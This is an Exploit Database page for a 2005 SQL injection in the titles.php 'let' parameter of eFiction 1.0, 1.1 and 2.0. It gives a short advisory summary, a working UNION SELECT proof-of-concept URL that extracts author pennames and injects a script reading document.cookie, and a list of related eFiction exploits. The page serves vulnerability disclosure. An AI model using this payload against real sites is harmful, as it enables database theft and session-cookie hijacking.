Exploit Database - Logo

efiction 1.0/1.1/2.0 - 'titles.php' SQL Injection

EDB-ID: 26592 Author: retrogod@aliceposta.it Published: 2005-11-25
CVE: CVE-2005-4168 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: Link Tags: N/A
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
source: http://www.securityfocus.com/bid/15568/info
 
eFiction is prone to SQL injection, remote file upload, and cross site scripting vulnerabilities.
 
These vulnerabilities may allow an attacker to view and modify sensitive information, gain unauthorized access, modify and corrupt the underlying database application, and obtain a victim's authentication credentials.
 
eFiction versions 1.0, 1.1 and 2.0 are reported to be vulnerable; other versions may also be affected. 

http://www.example.com/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,'<script>alert(document.cookie)</script>'
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*

Related Exploits

Trying to match CVEs (1): CVE-2005-4168
Trying to match OSVDBs (1): 21120
Other Possible E-DB Search Terms: efiction 1.0/1.1/2.0,  efiction 1.0,  efiction
Date D V Title Author
2005-11-25Download Exploit Code Verified efiction 1.0/1.1/2.0 - 'sid' Parameter SQL Injectionretrogod@al...
2005-11-25Download Exploit Code Verified efiction 1.0/1.1/2.0 - 'titles.php' Cross-Site Scriptingretrogod@al...
2005-11-25Download Exploit Code Verified efiction 1.0/1.1/2.0 - 'uid' Parameter SQL Injectionretrogod@al...
2005-11-25Download Exploit Code Verified eFiction 2.0 - Fake '.GIF' Arbitrary File Uploadrgod
2008-06-11Download Exploit Code Verified eFiction 3.0 - 'toplists.php' SQL InjectionMr.SQL
2007-02-22Download Exploit Code Verified eFiction 3.1.1 - 'path_to_smf' Remote File InclusionThE dE@Th
2006-08-25Download Exploit Code Verified eFiction < 2.0.7 - Remote Admin Authentication BypassVipsta
Menu